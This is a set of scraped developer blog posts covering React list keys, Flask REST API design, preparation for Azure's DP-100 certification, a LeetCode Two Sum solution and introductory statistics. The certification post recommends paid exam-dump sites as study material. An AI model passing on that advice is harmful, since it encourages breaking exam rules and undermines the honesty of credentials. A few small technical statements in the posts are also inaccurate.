return (
<>
<CategoryContainer data={data} />
</>
);
}
```
```
// CategoryContainer.tsx
"use client";
import Image from "next/image";
import React, { FC, useEffect, useState } from "react";
import ProductResponse from "./from-type-folder-lets-assume";
type Props = {
data: string[];
};
const CategoryContainer: FC<Props> = ({ data }) => {
const [selectedCategory, setSelectedCategory] = useState("");
const [productDetails, setProductDetails] = useState<ProductResponse | null>(
null
);
useEffect(() => {
(async () => {
const response = await fetch(
"https://dummyjson.com/products/category/" + selectedCategory
);
const data: ProductResponse = await response.json();
setProductDetails(data);
})();
}, [selectedCategory]);
return (
<div className="max-w-6xl mx-auto my-10">
{data?.map((item, index) => {
return (
<button
key={index}
type="button"
onClick={() => setSelectedCategory(item)}
className={`text-gray-900 border border-gray-300 font-medium rounded-full text-sm px-5 py-2.5 me-2 mb-2 uppercase ${
item === selectedCategory ? "bg-gray-600 text-white" : "bg-white"
}`}
>
{item}
</button>
);
})}
<h1 className="my-5 italic">
{selectedCategory ? (
<>
Product Details of{" "}
<span className="font-bold uppercase">{selectedCategory}</span>
</>
) : (
"Please select a category from above"
)}
</h1>
<div className="grid grid-cols-3 gap-3">
{productDetails?.products?.map((product, index) => {
return (
<div
key={index}
className="max-w-sm p-6 bg-white border border-gray-200 rounded-lg shadow dark:bg-gray-800 dark:border-gray-700"
>
<div>
<h2>{product.title}</h2>
<p>{product.description}</p>
<Image
key={index}
width={100}
height={100}
className="w-full h-full"
src={product.images?.[0]}
alt={product.title}
/>
</div>
</div>
);
})}
</div>
</div>
);
};
export default CategoryContainer;
```
In the **CategoryContainer**, we loop through two lists: one for categories and another for product details of the selected category. Initially, we used the index as the key for both loops. This caused issues where images were not updating correctly when switching categories, as shown in this visual

**Debugging the Problem**
When switching categories, the content updated immediately, but the images took some time to load. This suggested that React wasn't re-rendering the components correctly.
By examining the code, we noticed that using the index as the key prevented React from recognizing that new components needed to be rendered. React was reusing components with old images, leading to the delay
**Solution**
We needed to provide a unique key for each product. Fortunately, the API response included a unique id for each product:

Using product.id as the key resolved the issue, ensuring React correctly identified and rendered new components:
**Conclusion**
In React, always use a unique identifier for keys instead of the index. This ensures efficient and correct re-rendering of components, preventing issues like delayed image updates or incorrect component states.
| nadeemkhanrtm |
1,881,569 | The Art of API Design: Lessons Learned in Building VividBlog | The old adage, "Measure twice, cut once," applies perfectly to API design. A well-designed API is the... | 0 | 2024-06-08T21:11:41 | https://dev.to/ezekiel_77/the-art-of-api-design-lessons-learned-in-building-vividblog-7je | webdev, restapi, backend, design | The old adage, __"Measure twice, cut once,"__ applies perfectly to API design. A well-designed API is the foundation for a robust and maintainable application. In this post, I'll share my experiences designing the API for [VividBlog](https://github.com/Ezek-iel/VividBlog), a blog platform I recently built, highlighting the importance of thorough planning and the thought processes behind key decisions.
## Three-Layer Cake-Structure🎂
I always take API's as a 3 layer structure

I approach APIs with a three-layer structure:
- **Database Layer:** The rock-solid foundation holding your data.
- **Schema Layer:** The validation gatekeeper ensuring data integrity.
- **Endpoint Layer:** The public interface where developers interact with your API.
**Designing for Flexibility: Database-First vs. UI-Mockup First**
While I tackled VividBlog's design database-first due to resource constraints, there's no one-size-fits-all approach. Here's how to choose the right path:
- **Database-First:** Ideal for data-centric APIs where data integrity and structure are paramount. Think financial transactions or inventory management systems.
- **UI-Mockup First:** Great for user-driven APIs where a seamless user experience is crucial. E-commerce applications or social media platforms benefit from this approach.
The key lies in finding a balance. Even without a full UI mockup, sketching core functionalities and data models provides a valuable starting point.
> In the absence of a finalized UI design, I adopted a data-centric approach to schema design. This involved creating separate schemas for:
- The JSON data expected in the request payload...
- The JSON data returned in the response payload...
---
## Building the Foundation: Flask-RESTful, Marshmallow and SQLAlchemy
For building the VividBlog API, I opted for a popular combination of tools:
- [**Flask-RESTful:**](https://flask-restful.readthedocs.io/en/latest/) A lightweight framework within the Flask ecosystem that simplifies building RESTful APIs in Python.
- [**Marshmallow:**](https://marshmallow.readthedocs.io/en/stable/quickstart.html#required-fields) A powerful data validation library that streamlines the process of ensuring data sent in requests adheres to the expected format.
This combination provides a robust and efficient foundation for API development.
**Database Choices: Balancing Flexibility and Structure**
While I initially explored SQLite for its simplicity, I ultimately decided to leverage SQLAlchemy as the Object-Relational Mapper (ORM). SQLAlchemy offers several advantages:
- **Database Agnosticism:** It allows working with various database backends like PostgreSQL, MySQL, or SQLite. This provides flexibility in choosing the most suitable database for your project's needs.
- **Data Modeling:** SQLAlchemy facilitates robust data modeling through its ORM capabilities, allowing you to define data structures that closely resemble your application objects.
While SQLite offers a convenient lightweight option, its data definition approach can be less strict compared to PostgreSQL. For projects requiring strong data integrity and complex data relationships, PostgreSQL often emerges as the preferred choice.
**Key Takeaway: Choosing the Right Tools**
The choice of frameworks and databases depends on your project's specific requirements. Consider factors like scalability, data complexity, and team familiarity when making these decisions.
---
## Resources: Modelling your API's with Collections and Singletons
Effective API design involves representing your data models as resources. This section explores two key resource types:
- **Collection Resources:** Represent a collection of similar data items. In VividBlog, this could be a list of all blog posts, potentially filtered by criteria like category or author.
- **Singleton Resources:** Represent a single, unique data item. For VividBlog, this might be a specific blog post identified by its unique ID.
**The Power of the Pair:**
It's generally recommended to create both collection and singleton resources for each data model in your API. This provides a consistent and flexible way to interact with your data:
- **Collection Resources:** Ideal for browsing, searching, and filtering through multiple data items.
- **Singleton Resources:** Perfect for retrieving, creating, updating, or deleting a specific data item.
**Example: VividBlog's Blog Posts**
Consider VividBlog's blog posts stored in a database table or relation named "blog." Here's how these resources would be implemented:
1. **Collection Resource:** An endpoint like `/api/v1/blogs` might return a list of all blog posts, potentially filtered by parameters like `name` or `author_id`.
2. **Singleton Resource:** An endpoint like `/api/v1/blogs/123` (where 123 is the unique ID of a specific blog post) would return details about that particular post.
---
## Schema and Validation

Marshmallow plays a crucial role in VividBlog's API by providing data validation for both incoming and outgoing data. This ensures data integrity and streamlines communication between the API and client applications.
**Separate Schemas for Distinct Purposes:**
I implemented two distinct Marshmallow schemas for each data model:
1. **Request Schema:** This schema defines the expected structure and validation rules for data sent in API requests. It acts as a gatekeeper, ensuring only valid data reaches the backend logic.
2. **Response Schema:** This schema dictates the format of data returned in API responses. It defines the data structure and any transformations applied to the data before serialization.
**Example: User Management Schemas**
Consider the user model in VividBlog. Here are the corresponding Marshmallow schemas:
1. **CreateUserSchema:** This schema would likely include fields for username, email, and password (hashed for security). It would enforce validation rules like required fields and email format.
2. **UserItemSchema:** This schema might include the user's ID, username, email (if appropriate for the response context), and potentially other relevant user data. It would determine which data is included in the response and how it's formatted.
By separating request and response schemas, you achieve clear separation of concerns and ensure data validation happens at the appropriate stage of the API interaction.
__To illustrate schema design, let's look at a simplified example using Marshmallow for user data:__
```python
from marshmallow import Schema, fields
class CreateUserSchema(Schema):
username = fields.Str(required=True)
email = fields.Email(required=True)
class UserItemSchema(Schema):
id = fields.Integer(read_only=True)
username = fields.Str()
email = fields.Email()
created_at = fields.DateTime(read_only=True)
```
The `CreateUserSchema` validates incoming user data, while `UserItemSchema` defines the response structure, __excluding automatically generated fields like `id` and `created_at`.__
---
## Login
VividBlog utilizes JSON Web Tokens (JWTs) for user authentication. JWTs are a popular and secure mechanism for transmitting authentication information between a client and a server. They offer several advantages:
- **Security:** JWTs are self-contained and digitally signed, making them tamper-proof and preventing unauthorized access.
- **Statelessness:** The server doesn't need to store session data, simplifying architecture and improving scalability.
- **Flexibility:** JWTs can encode additional user information beyond just authentication status, allowing for role-based authorization.
For a deeper understanding of JWTs and their implementation, I recommend exploring resources dedicated to JWT authentication best practices.
---
## Efficient Data Navigation: Pagination and Query Parameters
VividBlog employs pagination to allow users to navigate through large datasets of blog posts efficiently. Pagination breaks down data into manageable chunks (pages) that users can navigate through using query parameters.
**The Art of Pagination:**
Designing an effective pagination scheme involves several considerations:
- **Choosing the Right Approach:** There are two main pagination strategies: offset-based and cursor-based. VividBlog utilizes offset-based pagination, where `currentPage` and `pageSize` parameters define the starting point and number of items per page in the requested data.
- **Clear and Readable URIs:** I opted for camelCase query parameters (`currentPage` and `pageSize`) to enhance the readability of URIs. This makes it easier for developers to understand the purpose of each parameter at a glance.
- **Handling Edge Cases:** A robust pagination system should handle edge cases like empty pages or exceeding the total number of items. This might involve returning appropriate error messages or adjusting the requested page number.
**Example: Paginating Blog Posts**
Imagine a scenario where VividBlog has 50 blog posts. Here's how pagination would work:
- A request with `currentPage=1` and `pageSize=10` would retrieve the first 10 blog posts.
- A request with `currentPage=3` and `pageSize=10` would retrieve posts 21 to 30 (assuming there are at least 30 posts).
**Beyond Pagination: Leveraging Query Parameters**
Query parameters can extend beyond pagination. VividBlog might also allow filtering posts by parameters like `name` or `author_id`. This empowers users to refine their search results and find the information they need quickly
By carefully considering these elements, you can design a pagination system that offers a smooth and efficient user experience while maintaining clean and readable URIs.
---
## Importance of designing API's
**Beyond Time Saved: The Power of Thorough Design**
The time saved by meticulous design goes beyond just a few initial weeks. Here's how a well-designed API pays dividends in the long run:
- **Maintainability:** A clear and logical structure makes it easier for developers to understand, modify, and extend the API as your project evolves.
- **Scalability:** A well-designed foundation can accommodate increased usage without buckling under pressure.
- **Consistency:** Developers using your API will experience a uniform and predictable interaction, streamlining development efforts.
- **Documentation:** A well-organized API with clear logic is easier to document, making it more accessible to a wider developer audience.
---
## What would you do differently?
I'm always looking for ways to improve my API design skills. If you've encountered similar challenges or have insights on how I could have approached VividBlog's design differently, please share your thoughts in the comments below! Engaging in this conversation can help all of us build even better APIs in the future. | ezekiel_77 |
1,880,478 | How I Aced the DP-100 Exam and Became an Azure Data Scientist Associate | From some days I earned my Microsoft Certified: Azure Data Scientist Associate (DP-100) 🎉🎉 This... | 0 | 2024-06-08T20:34:54 | https://dev.to/mohamed-bekheet/how-i-aced-the-dp-100-exam-and-became-an-azure-data-scientist-associate-1ng | microsoft, azure, certification, datascience | From some days I earned my Microsoft Certified: _**Azure Data Scientist Associate (DP-100)**_ 🎉🎉 This certification journey has been both challenging and rewarding, pushing me to expand my knowledge and skills in data science and machine learning on the Azure platform. Whether you're considering this certification for career advancement or to validate your expertise, I want to share my experience and the steps I took to achieve this milestone. Join me as I walk you through my journey, from the initial decision to pursue the certification to the strategies and resources that helped me succeed.
## 1. Determining Your Need for Certification

As a Machine Learning Engineer, I constantly work on AI and machine learning solutions for real-life applications. Cloud computing is a critical step in your career if you are a software engineer or machine learning engineer. When browsing job listings on LinkedIn or any hiring platform, you'll find that most machine learning or data science positions require experience, knowledge, and skills in cloud platforms (AWS, Azure, GCP).
Getting certified was a strategic move to formalize my expertise and advance my career. It provided concrete proof of my knowledge and skills in the certification content. After researching, I found that the following certifications are highly regarded and cater to the needs of machine learning professionals on the most popular cloud providers:
- AWS Certified Machine Learning - Specialty
- Google Cloud Certified - Machine Learning Engineer
- Microsoft Certified: Azure Data Scientist Associate
To see the best machine learning certifications for 2024, visit this [link](https://www.datacamp.com/blog/top-machine-learning-certifications).
## 2. Why Choose DP-100?

Azure is one of the most prominent cloud providers with a significant market share. Choosing Azure for certification increases your chances of working with companies or projects that use this platform. Validating your ability to design and implement data science solutions on Azure showcases your proficiency in a highly sought-after skill set.
Here are a few reasons why Azure certification is advantageous:
- High Demand for Azure Skills: Many organizations are adopting Azure for their cloud solutions, creating a demand for professionals with Azure expertise.
- Career Advancement: Certification can open doors to new job opportunities and promotions, giving you a competitive edge in the job market.
- Comprehensive Skill Validation: The DP-100 certification covers a wide range of skills, from setting up an Azure Machine Learning workspace to deploying models, ensuring you are well-prepared for real-world tasks.
- Recognition and Credibility: Being certified by Microsoft, a leading technology company, adds significant credibility to your resume.
For more insights on the benefits of being Microsoft Azure certified, check out this [article](https://cloudacademy.com/blog/10-reasons-you-should-be-microsoft-azure-certified/).
## 3. Gathering Certification Insights

Before committing to the DP-100 certification, I conducted thorough research to understand its requirements and benefits. Microsoft’s official certification page provided detailed information on the exam requirements, skills assessed, and available study resources. This intermediate-level certification costs between $80 and $160.
As a candidate for this certification, you should have subject matter expertise in applying data science and machine learning to implement and run machine learning workloads on Azure.
Responsibilities and Skills Required
Your responsibilities for this role include:
- Designing and Creating Work Environments: Setting up suitable environments for data science workloads.
- Data Exploration: Understanding and exploring data to extract meaningful insights.
- Training Machine Learning Models: Developing and refining models to ensure accuracy and reliability.
- Implementing Pipelines: Creating pipelines to streamline data processing and model training.
- Running Jobs: Preparing and executing jobs to ensure readiness for production.
- Managing, Deploying, and Monitoring Solutions: Overseeing scalable machine learning solutions to maintain performance and reliability.
As a candidate for this exam, you should have knowledge and experience in data science using:
Azure Machine Learning
MLflow
Skills Measured
The DP-100 certification assesses your ability to:
- Design and Prepare a Machine Learning Solution: Creating effective machine learning strategies and environments.
- Explore Data and Train Models: Analyzing data and building accurate machine learning models.
- Prepare a Model for Deployment: Ensuring models are ready for production deployment.
- Deploy and Retrain a Model: Managing the deployment process and continuously improving models.
For more information, visit the [Microsoft official website](https://learn.microsoft.com/en-us/credentials/certifications/azure-data-scientist/?practice-assessment-type=certification).
## 4. Breaking Down the Certification Content

The DP-100 exam may contain questions on preview features if those features are commonly used. Here’s a detailed breakdown of the topics covered:
### Manage Azure Resources for Machine Learning (25-30%)
- Create an Azure Machine Learning Workspace
Set up an Azure Machine Learning workspace
Configure workspace settings
Manage a workspace using Azure Machine Learning Studio
- Manage Data in an Azure Machine Learning Workspace
Select Azure storage resources
Register and maintain datastores
Create and manage datasets
- Manage Compute for Experiments in Azure Machine Learning
Determine appropriate compute specifications for training workloads
Create compute targets for experiments and training
Configure Attached Compute resources, including Azure Databricks
Monitor compute utilization
- Implement Security and Access Control in Azure Machine Learning
Determine access requirements and map them to built-in roles
Create custom roles
Manage role membership
Manage credentials using Azure Key Vault
- Set Up an Azure Machine Learning Development Environment
Create and share compute instances
Access Azure Machine Learning workspaces from other development environments
- Set Up an Azure Databricks Workspace
Create an Azure Databricks workspace and cluster
Create and run notebooks in Azure Databricks
Link an Azure Databricks workspace to an Azure Machine Learning workspace
### Run Experiments and Train Models (20-25%)
- Create Models Using the Azure Machine Learning Designer
Create a training pipeline using Azure Machine Learning Designer
Ingest data in a designer pipeline
Use designer modules to define a pipeline data flow
Use custom code modules in the designer
- Run Model Training Scripts
Create and run experiments using the Azure Machine Learning SDK
Configure run settings for scripts
Consume data from a dataset in experiments using the Azure Machine Learning SDK
Run training scripts on Azure Databricks compute
- Generate Metrics from Experiment Runs
Log metrics from experiment runs
Retrieve and view experiment outputs
Use logs to troubleshoot experiment run errors
Use MLflow to track experiments
Track experiments running in Azure Databricks
- Use Automated Machine Learning to Create Optimal Models
Use the Automated ML interface in Azure Machine Learning Studio
Use Automated ML from the Azure Machine Learning SDK
Select pre-processing options and algorithms to be searched
Define primary metrics and retrieve the best model
- Tune Hyperparameters with Azure Machine Learning
Select sampling methods
Define the search space and primary metrics
Define early termination options
Find models with optimal hyperparameter values
### Deploy and Operationalize Machine Learning Solutions (35-40%)
- Select Compute for Model Deployment
Consider security for deployed services
Evaluate compute options for deployment
- Deploy a Model as a Service
Configure deployment settings
Deploy registered models
Deploy models trained in Azure Databricks to Azure Machine Learning endpoints
Consume deployed services
Troubleshoot deployment container issues
- Manage Models in Azure Machine Learning
Register trained models
Monitor model usage and data drift
- Create an Azure Machine Learning Pipeline for Batch Inferencing
Configure a ParallelRunStep
Configure compute for batch inferencing pipelines
Publish and run batch inferencing pipelines
- Publish an Azure Machine Learning Designer Pipeline as a Web Service
Create target compute resources
Configure inference pipelines
Consume deployed endpoints
- Implement Pipelines Using the Azure Machine Learning SDK
Create and run pipelines
Pass data between pipeline steps
Monitor pipeline runs
- Apply ML Ops Practices
Trigger Azure Machine Learning pipelines from Azure DevOps
Automate model retraining based on new data
Refactor notebooks into scripts
Implement source control for scripts
### Implement Responsible Machine Learning (5-10%)
- Use Model Explainers to Interpret Models
Select model interpreters
Generate feature importance data
- Describe Fairness Considerations for Models
Evaluate model fairness based on prediction disparity
Mitigate model unfairness
- Describe Privacy Considerations for Data
Describe principles of differential privacy
## 5. Identifying Knowledge Gaps and Optimizing Preparation Time

Assessing my current skills against the exam requirements was a crucial step. By doing this, I was able to identify specific areas that needed improvement. For instance, I realized I lacked hands-on experience with certain Azure services and advanced model management techniques. Here’s how this assessment helped streamline my preparation:
- Focused Learning: By pinpointing exact knowledge gaps, I could tailor my study plan to focus on the areas where I was weakest. This prevented me from spending unnecessary time on topics I was already familiar with.
- Targeted Practice: I concentrated my practical exercises on the Azure services and tools I needed more experience with. This included setting up and managing Azure Machine Learning workspaces, configuring compute resources, and implementing security measures.
- Advanced Techniques: For advanced model management, I dedicated time to understanding and applying best practices in model deployment, monitoring, and retraining. This involved working with Azure ML SDK, Automated ML, and pipeline configurations.
- Efficient Use of Resources: By knowing exactly what I needed to learn, I could select the most relevant resources, such as specific modules from Microsoft Learn, focused tutorials, and hands-on labs that directly addressed my gaps.
- Time Management: This targeted approach allowed me to optimize my study schedule. Instead of a broad, unfocused study plan, I created a streamlined timeline that ensured I covered all necessary topics efficiently. This significantly reduced my overall preparation time.
By taking these steps, I not only filled my knowledge gaps but also prepared more effectively and efficiently for the DP-100 exam. This strategic approach ensured that I was well-equipped to tackle the certification confidently.
## 6. Assembling Your Learning Toolkit

To prepare for the DP-100 exam, I curated a comprehensive learning toolkit from various high-quality resources. Here’s what I used:
### 1. Coursera Specialization: Microsoft Azure Data Scientist Associate (DP-100) [link is here](https://www.coursera.org/professional-certificates/azure-data-scientist?msockid=117ab3c2fd8d68331080a7b3fc236966)

This specialization includes five in-depth courses:
- Prepare for DP-100: Data Science on Microsoft Azure Exam
- Microsoft Azure Machine Learning for Data Scientists
- Build and Operate Machine Learning Solutions with Azure
- Create Machine Learning Models in Microsoft Azure
- Perform Data Science with Azure Databricks
### 2. DP-100 Study Guide by Hugo Barona
Hugo Barona’s study guide provides a well-organized list of resources and links to essential Microsoft Azure documentation. You can find it [here](https://www.hugobarona.com/dp-100-study-guide/).
### 3. Books
While I didn't use books extensively, my research indicated the following as top recommendations:
Azure Data Scientist Associate Certification Guide

Mastering Azure Machine Learning

[GitHub Repository](https://github.com/PacktPublishing/Mastering-Azure-Machine-Learning-Second-Edition?tab=readme-ov-file)
### 4. YouTube Playlist
A highly recommended YouTube playlist covering key DP-100 topics can be found [here](https://www.youtube.com/playlist?list=PLWsnB2XBNJzLNIdPGe81CImXnaeQMeLyx).
These resources provided a blend of theoretical knowledge and practical exercises, ensuring a well-rounded preparation for the DP-100 certification exam. By leveraging these tools, I was able to build a strong foundation in Azure Machine Learning and data science, making my certification journey both effective and engaging.
## 7. Gaining Practical Experience

Hands-on labs are invaluable for gaining practical experience with Azure. Here’s how you can build your skills and apply your knowledge, often for free:
Azure Free Account: Start by creating an Azure free account. During the first 30 days, you receive $200 in credit to use on any Azure service, except for third-party Marketplace purchases. This allows you to experiment with different tiers and types of Azure services. If you don’t use all of your credit within 30 days, it’s lost. After the initial 30 days, you can continue to use a limited quantity of some services for up to 12 months. For more information, visit [Azure Free Services](https://learn.microsoft.com/en-us/azure/cost-management-billing/manage/create-free-services) .
Azure for Students: If you're a student, you can benefit from Azure for Students, which offers $100 in credit each year for up to 12 months, without needing a credit card. This is a fantastic way to gain access to Azure services and enhance your learning. For more details, visit [Azure for Students](https://azure.microsoft.com/en-in/free/students/).
By leveraging these free resources, you can gain hands-on experience with Azure, apply your theoretical knowledge, and develop practical skills essential for passing the DP-100 exam and excelling in your career.
## 8. Focus on the Journey

Don’t just aim for the certification; focus on gaining knowledge, completing labs, and improving your skills. Once you hold the certification, you’ll be expected to have the competencies it represents. So, immerse yourself in learning as much as possible to be market-ready. Here’s how to make the most of your certification journey:
- Knowledge Over Certification: Concentrate on understanding concepts deeply and applying them practically rather than just aiming to pass the exam. This approach will not only help you ace the certification but also equip you with the skills needed in the real world.
- Hands-on Labs: Engage in hands-on labs and practical exercises to solidify your understanding. Use free resources like Azure free accounts and Azure for Students to practice without financial constraints.
- Skill Enhancement: Continuously work on improving your skills. Attend workshops, participate in webinars, and join study groups to stay updated with the latest advancements in Azure and data science.
## 9. Mastering Exam Question Styles

Practicing with exam questions is crucial for success. Here are some resources I utilized:
Microsoft’s Official Practice Tests: Access official practice tests directly from Microsoft to get a feel for the exam format and types of questions. You can find them [here](https://learn.microsoft.com/en-us/credentials/certifications/azure-data-scientist/practice/assessment?assessment-type=practice&assessmentId=62&practice-assessment-type=certification).
Exam Dumps and Community Forums:
ExamTopics: Offers 77 free questions and 486 premium questions for $49.99 per month. This resource provides a wide variety of questions to help you prepare. Check it out [here](https://www.examtopics.com/exams/microsoft/dp-100/view/12/).
CertiQ: An alternative to ExamTopics, offering 498 questions this month at a cheaper rate of $25. For a limited time, you can get premium access for 6 months at just $9 (64% off). Explore more [here](https://www.certyiq.com/).
## 10. Going to the Exam

You can register for the Azure exam through Pearson VUE, which offers two options: taking the exam at a test center or online. Be sure to read the policies carefully to understand the exam duration and experience. For more details, visit [Microsoft's exam experience page](https://learn.microsoft.com/en-us/credentials/support/exam-duration-exam-experience). Good luck!
## 11. Showcasing Your Achievement

After passing the exam, I made sure to showcase my achievement:
-LinkedIn: I shared my success on LinkedIn, which helped me connect with peers and potential employers.
-Resume: Adding the certification to my CV highlighted my expertise to recruiters.
- Professional Networks: Mentioning my certification in professional forums and communities established my credibility and opened up new opportunities.
## 12. Staying Updated

Keeping up with Azure updates and exam changes is essential for success. Here’s how I stayed informed:
- Microsoft’s Official Blog: Regularly reading [Microsoft’s official blog](https://blogs.microsoft.com/) helped me stay updated on the latest Azure developments.
- Azure Dev Community on LinkedIn: Following the [Azure Developer Community](https://www.linkedin.com/company/azdevcommunity/posts/?feedView=all) on LinkedIn provided valuable insights and updates.
- Azure Updates: Checking [Azure updates](https://azure.microsoft.com/en-us/updates/) ensured I was aware of any new tools or changes that could affect my work.
- Data Science and Machine Learning Communities: Engaging with online communities kept me connected with other professionals and industry trends.
Staying informed ensured I was prepared for any new tools or exam modifications. Remember, you may need to retake the certification after one year. For retake policies, visit [Microsoft’s retake policy page](https://learn.microsoft.com/en-us/credentials/support/retake-policy).
## 13. Applying Knowledge in Real Work

Integrating what I learned into daily projects was crucial. Using new techniques and tools in real-world scenarios not only reinforced my knowledge but also demonstrated the practical value of the certification. This hands-on experience helped solidify my skills and made me more effective in my role.

Earning the Microsoft Certified: Azure Data Scientist Associate (DP-100) certification has been a rewarding journey that has enhanced my skills and opened new career opportunities. By following a structured approach—focusing on practical experience, staying updated with the latest Azure developments, and leveraging a variety of study materials—I was able to pass the exam confidently and effectively.
I hope my experience inspires and guides you on your own certification journey. Remember, it's not just about the certification; it's about gaining the knowledge and skills to excel in your field.
Thank you for reading my story! If you have any questions or need further guidance, feel free to reach out. I invite you to follow and connect with me on LinkedIn and other professional networks. Let's continue learning and growing together!
Follow and Connect with Me:
[LinkedIn](https://www.linkedin.com/in/mohamed-bekheet-/)
Good luck on your journey to becoming a certified Azure Data Scientist! | mohamed-bekheet |
1,881,565 | 1. Two Sum | Topic: Array & Hashing Soln 1 (dictonary solution): After learning how to use dictionaries in... | 0 | 2024-06-08T20:20:12 | https://dev.to/whereislijah/1-two-sum-4a4n | Topic: Array & Hashing
Soln 1 (dictonary solution):
After learning how to use dictionaries in the previous leetcode questions, i decided to see how many more solutions i can provide for using it.
1. Create an empty dictionary to store the key-value pairs (this will be where the values and it's respective indiced will be stored)
2. loop through the list nums with both the indices and the values:
- Initialize a variable (complement); its value will be the result of the target minus the current number [Major logic of the solution] - for every number in the list
- if the complement exists in the dictionary, then we return the index of the complement in the dictionary and the current index from the loop we are iterating with.
- else we add this complement into our dictionary (both key and value) which means
```
class Solution:
def twoSum(self, nums: List[int], target: int) -> List[int]:
num_index = {}
for i, num in enumerate(nums):
complement = target - num
if complement in num_index:
return [num_index[complement], i]
else:
num_index[nums[i]] = i
```
Soln 2 (Bruteforce):
1. iterate through the list using index i (outer loop)
2. iterate through the list using index j starting from (i + j) to avoid duplicates (inner loop)
- compare the sum of both elements at indices i and j to the target
- if the sum is equal to the target then return the indices [i, j]
```
for i in range(len(nums)):
for j in range(i + 1, len(nums)):
if nums[i] + nums[j] == target:
return([i, j])
```
Note: Hashmaps use key-value pairs, try to solve questions with methods you know before trying to improve them. | whereislijah | |
1,881,500 | Statistics for Data Science and Machine Learning | Population vs. Sample Population A population consists of the entire set of... | 0 | 2024-06-08T20:05:00 | https://dev.to/harshm03/statistics-for-data-science-and-machine-learning-8f1 | datascience, machinelearning, deeplearning | ### Population vs. Sample
#### Population
A population consists of the entire set of individuals or items that are the subject of a statistical study. It encompasses every member that fits the criteria of the research question.
- **Characteristics**:
- **Comprehensive**: Includes all individuals or items of interest.
- **Parameters**: Measurements that describe the entire population. Examples of parameters include:
- **Population Mean (μ)**: The average of all values in the population.
- **Population Standard Deviation (σ)**: A measure of the dispersion of values in the population.
**Example**: All students enrolled in a university.
#### Sample
A sample is a subset of the population selected for the purpose of analysis. It allows researchers to draw conclusions about the population without examining every individual.
- **Characteristics**:
- **Subset**: A smaller, manageable group chosen from the population.
- **Statistics**: Measurements that describe the sample. Examples of statistics include:
- **Sample Mean (x̄)**: The average of all values in the sample.
- **Sample Standard Deviation (s)**: A measure of the dispersion of values in the sample.
**Example**: A group of 200 students chosen randomly from a university's total enrollment.
### Mean, Median, and Mode
#### Mean
The mean, or average, is a measure of central tendency that is calculated by summing all the values in a dataset and then dividing by the number of values.
**Formula**:
```plaintext
Mean (x̄) = (Σx) / N
```
where:
- Σx is the sum of all values in the dataset.
- N is the number of values in the dataset.
**Example**:
For the dataset: 2, 4, 6, 8, 10
```plaintext
Mean (x̄) = (2 + 4 + 6 + 8 + 10) / 5 = 30 / 5 = 6
```
#### Median
The median is the middle value of a dataset when it is ordered from least to greatest. If the dataset has an odd number of observations, the median is the middle value. If it has an even number of observations, the median is the average of the two middle values.
**Formula**:
```plaintext
For an odd number of observations: Median = middle value
For an even number of observations: Median = (middle value 1 + middle value 2) / 2
```
**Example**:
For the dataset (odd number): 1, 3, 3, 6, 7, 8, 9
```plaintext
Median = 6
```
For the dataset (even number): 1, 2, 3, 4, 5, 6, 8, 9
```plaintext
Median = (4 + 5) / 2 = 9 / 2 = 4.5
```
#### Mode
The mode is the value that appears most frequently in a dataset. A dataset can have more than one mode if multiple values have the same highest frequency, or no mode if all values are unique.
**Formula**:
```plaintext
Mode = value with the highest frequency
```
**Example**:
For the dataset: 1, 2, 2, 3, 4, 4, 4, 5, 5
```plaintext
Mode = 4
```
### Variance and Standard Deviation
#### Variance
Variance measures the spread of a set of numbers. It represents the average of the squared differences from the mean, providing a sense of how much the values in a dataset deviate from the mean.
**Formula**:
For a population:
```plaintext
Variance (σ²) = Σ (x - μ)² / N
```
For a sample:
```plaintext
Variance (s²) = Σ (x - x̄)² / (n - 1)
```
where:
- Σ is the sum of all values.
- x is each individual value.
- μ is the population mean.
- x̄ is the sample mean.
- N is the total number of values in the population.
- n is the total number of values in the sample.
**Example**:
For the sample dataset: 2, 4, 4, 4, 5, 5, 7, 9
```plaintext
1. Calculate the sample mean (x̄):
x̄ = (2 + 4 + 4 + 4 + 5 + 5 + 7 + 9) / 8 = 40 / 8 = 5
2. Calculate each (x - x̄)²:
(2 - 5)² = 9
(4 - 5)² = 1
(4 - 5)² = 1
(4 - 5)² = 1
(5 - 5)² = 0
(5 - 5)² = 0
(7 - 5)² = 4
(9 - 5)² = 16
3. Sum of squared differences:
Σ (x - x̄)² = 9 + 1 + 1 + 1 + 0 + 0 + 4 + 16 = 32
4. Calculate the variance:
s² = 32 / (8 - 1) = 32 / 7 ≈ 4.57
```
#### Standard Deviation
Standard deviation is the square root of the variance. It provides a measure of the spread of the values in a dataset in the same units as the data, making it easier to interpret.
**Formula**:
For a population:
```plaintext
Standard Deviation (σ) = √(Σ (x - μ)² / N)
```
For a sample:
```plaintext
Standard Deviation (s) = √(Σ (x - x̄)² / (n - 1))
```
**Example**:
Using the variance calculated above (s² ≈ 4.57):
```plaintext
Standard Deviation (s) = √4.57 ≈ 2.14
```
### Correlation Coefficient
The correlation coefficient measures the strength and direction of the linear relationship between two variables. It ranges from -1 to 1, where:
- r = 1: Perfect positive correlation
- r = -1: Perfect negative correlation
- r = 0: No correlation
#### Formula
The Pearson correlation coefficient (often denoted as r) is calculated using the following formula:
```plaintext
r = Σ((x - x̄)(y - ȳ)) / √(Σ(x - x̄)² * Σ(y - ȳ)²)
```
where:
- x and y are the individual values of the two variables.
- x̄ and ȳ are the means of the two variables.
- Σ denotes the summation over all data points.
#### Interpretation
- r > 0: Positive correlation (as one variable increases, the other tends to increase).
- r < 0: Negative correlation (as one variable increases, the other tends to decrease).
- r = 0: No linear correlation.
- The closer r is to 1 or -1, the stronger the correlation.
#### Example
Consider two variables, X (hours of study) and Y (exam scores), for a group of students:
| Hours of Study (X) | Exam Scores (Y) |
|---------------------|-----------------|
| 3 | 65 |
| 4 | 75 |
| 6 | 85 |
| 7 | 90 |
| 9 | 95 |
**Calculations**:
- Calculate the means (x̄ and ȳ).
- Calculate the deviations from the means (x - x̄ and y - ȳ).
- Square the deviations and sum them.
- Multiply the deviations of X and Y, sum them, and divide by the product of the square roots of the sum of squared deviations.
**Result**:
```plaintext
r ≈ 0.98
```
#### Interpretation
The correlation coefficient r is approximately 0.98, indicating a strong positive linear relationship between hours of study and exam scores. As hours of study increase, exam scores tend to increase as well.
### Point Estimation
Point estimation is a statistical method used to estimate an unknown parameter of a population based on sample data. It involves using a single value, called a point estimate, to approximate the true value of the parameter.
#### Key Concepts
- **Population**: The entire group of individuals, items, or events of interest in a statistical study.
- **Parameter**: A numerical characteristic of a population that is unknown and typically of interest in statistical analysis. Examples include the population mean, population proportion, population variance, etc.
- **Sample**: A subset of the population from which data is collected.
